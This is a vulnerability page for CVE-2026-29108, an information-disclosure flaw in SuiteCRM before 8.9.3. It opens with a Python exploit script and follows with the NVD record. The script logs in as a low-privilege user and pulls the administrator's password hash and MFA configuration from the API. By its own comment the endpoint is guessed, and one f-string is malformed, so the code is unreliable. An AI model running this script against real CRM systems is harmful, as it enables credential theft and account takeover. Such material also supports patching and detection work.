CVE-2026-29108

import requests # Configurations target_url = "http://example-suitecrm.com" login_api = f"target_url}/api/access" vulnerable_api = f"{target_url}/api/v8/Users/{{user_id}}" # Hypothetical endpoint based on description attacker_credentials = { "username": "low_priv_user", "password": "password123" } def exploit(): session = requests.Session() # Step 1: Authenticate as a low-privilege user print("[+] Logging in as low-privilege user...") auth_resp = session.post(login_api, json=attacker_credentials) if auth_resp.status_code != 200: print("[-] Login failed") return print("[+] Login successful") # Step 2: Attack the vulnerable endpoint to fetch admin user (ID=1 usually) target_id = 1 print(f"[+] Attempting to fetch details for User ID: {target_id}") # The vulnerability allows any authenticated user to query any ID exploit_resp = session.get(vulnerable_api.format(user_id=target_id)) if exploit_resp.status_code == 200: data = exploit_resp.json() print("[+] Exploit successful! Leaked data:") print(f" Username: {data.get('user_name')}") print(f" Password Hash: {data.get('user_hash')}") print(f" MFA Config: {data.get('mfa_config')}") else: print("[-] Exploit failed or endpoint patched.") if __name__ == "__main__": exploit()

{"cve": {"id": "CVE-2026-29108", "sourceIdentifier": "[email protected]", "published": "2026-03-20T00:16:15.983", "lastModified": "2026-03-23T16:49:25.540", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software application. Prior to versions 8.9.3, an authenticated API endpoint allows any user to retrieve detailed information about any other user, including their password hash, username, and MFA configuration. As any authenticated user can query this endpoint, it's possible to retrieve and potentially crack the passwords of administrative users. Version 8.9.3 patches the issue."}, {"lang": "es", "value": "SuiteCRM es una aplicación de software de Gestión de Relaciones con Clientes (CRM) de código abierto y lista para empresas. Antes de las versiones 8.9.3, un endpoint de API autenticado permite a cualquier usuario recuperar información detallada sobre cualquier otro usuario, incluyendo su hash de contraseña, nombre de usuario y configuración de MFA. Dado que cualquier usuario autenticado puede consultar este endpoint, es posible recuperar y potencialmente descifrar las contraseñas de los usuarios administrativos. La versión 8.9.3 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:suitecrm:suitecrm:*:*:*:*:*:*:*:*", "versionEndExcluding": "8.9.3", "matchCriteriaId": "CD824E64-58E0-472C-84CB-6729B4B791DF"}]}]}], "references": [{"url": "https://github.com/SuiteCRM/SuiteCRM-Core/security/advisories/GHSA-xc8w-xc9v-45w5", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}